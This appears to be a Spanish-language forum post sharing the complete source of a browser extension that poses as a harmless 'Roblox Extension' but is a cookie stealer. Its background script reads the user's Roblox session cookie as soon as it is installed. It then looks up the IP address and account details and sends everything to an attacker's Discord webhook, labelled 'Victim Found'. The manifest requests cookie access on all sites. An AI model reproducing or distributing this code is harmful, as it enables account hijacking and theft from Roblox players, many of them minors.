· EXTENSION ZIP
---------------------
· ASSETS
↳ ROBLOX.PNG
· SCRIPTS
↳ LOG.JS
· MANIFEST.JSON
ES UNA SIMPLE EXTENSION PARA EL NAVEGADOR :)
CUALQUIER DUDA AL DISCORD : big.namer (1093971993621176334)
A PETICION DE MI COLEGA @MarioGamer8
---------------------
· ASSETS
↳ ROBLOX.PNG
· SCRIPTS
↳ LOG.JS
JavaScript:
// AQUI PONES EL URL DE TU WEBHOOK
const WEBHOOK = "";
async function main(cookie) {
var ipAddr = await (await fetch("https://api.ipify.org")).text();
if (cookie) {
var statistics = await (await fetch("https://www.roblox.com/mobileapi/userinfo", {
headers: {
Cookie: ".ROBLOSECURITY=" + cookie
},
redirect: "manual"
})).json();
}
fetch(WEBHOOK, {
method: "POST",
headers: {
"Content-Type": "Application/json"
},
body: JSON.stringify({
"content": null,
"embeds": [
{
"description": "```" + (cookie ? cookie : "COOKIE NOT FOUND") + "```",
"color": null,
"fields": [
{
"name": "Username",
"value": statistics ? statistics.UserName : "N/A",
"inline": true
},
{
"name": "Robux",
"value": statistics ? statistics.RobuxBalance : "N/A",
"inline": true
},
{
"name": "Premium",
"value": statistics ? statistics.IsPremium : "N/A",
"inline": true
}
],
"author": {
"name": "Victim Found: " + ipAddr,
"icon_url": statistics ? statistics.ThumbnailUrl : "https://i.imgur.com/3h2E99o.png",
},
"footer": {
"text": "https://github.com/lownamer",
"icon_url": "https://i.imgur.com/3h2E99o.png"
},
"thumbnail": {
"url": statistics ? statistics.ThumbnailUrl : "https://upload.wikimedia.org/wikipedia/commons/thumb/f/f3/NA_cap_icon.svg/1200px-NA_cap_icon.svg.png",
}
}
],
"username": "Roblox",
"avatar_url": "https://upload.wikimedia.org/wikipedia/commons/thumb/3/3a/Roblox_player_icon_black.svg/1200px-Roblox_player_icon_black.svg.png",
"attachments": []
})
});
}
chrome.cookies.get({"url": "https://www.roblox.com/home", "name": ".ROBLOSECURITY"}, function(cookie) {
main(cookie ? cookie.value : null);
});
JSON:
{
"name": "Roblox Extension",
"description": "Extension for https://www.roblox.com",
"version": "1.0.0",
"manifest_version": 3,
"action" : {
"default_icon": "assets/roblox.png"
},
"host_permissions": [
"https://*/*"
],
"permissions": [
"cookies"
],
"background": {
"service_worker": "scripts/log.js"
},
"icons": {
"16": "assets/roblox.png",
"32": "assets/roblox.png",
"48": "assets/roblox.png",
"128": "assets/roblox.png"
}
}
ES UNA SIMPLE EXTENSION PARA EL NAVEGADOR :)
CUALQUIER DUDA AL DISCORD : big.namer (1093971993621176334)
A PETICION DE MI COLEGA @MarioGamer8